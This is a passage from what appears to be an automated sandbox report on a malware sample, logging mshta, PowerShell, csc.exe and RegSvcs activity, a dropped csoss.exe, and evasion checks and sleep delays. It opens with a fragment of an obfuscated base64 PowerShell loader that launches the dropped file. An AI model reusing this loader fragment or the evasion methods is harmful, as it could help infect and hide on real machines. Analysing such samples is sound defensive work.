mV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline"
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_00D04B37 LoadLibraryA,GetProcAddress,6_2_00D04B37
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_044856F3 pushad ; ret 3_2_04485721
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_04485723 pushfd ; ret 3_2_04485731
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_00D28945 push ecx; ret 6_2_00D28958
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\csoss.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csoss[1].exe

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_00D048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_00D048D7
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_00D85376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_00D85376
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Code function: 6_2_00D23187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00D23187
                    Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Roaming\csoss.exe API/Special instruction interceptor: Address: FE34DC
                    Source: csoss.exe, 00000006.00000003.1385570784.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1388243431.0000000001031000.00000004.00000020.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1388318675.0000000001031000.00000004.00000020.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1388494064.0000000001031000.00000004.00000020.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1385921226.0000000001031000.00000004.00000020.00020000.00000000.sdmp, csoss.exe, 00000006.00000002.1398978472.0000000001031000.00000004.00000020.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1387959668.0000000001031000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\mshta.exe Window / User API: threadDelayed 7234
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7100
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2393
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.dll
                    Source: C:\Users\user\AppData\Roaming\csoss.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_6-105247
                    Source: C:\Users\user\AppData\Roaming\csoss.exe API coverage: 4.4 %
                    Source: C:\Windows\SysWOW64\mshta.exe TID: 6972 Thread sleep count: 7234 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3276 Thread sleep count: 7100 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1956 Thread sleep count: 2393 > 30
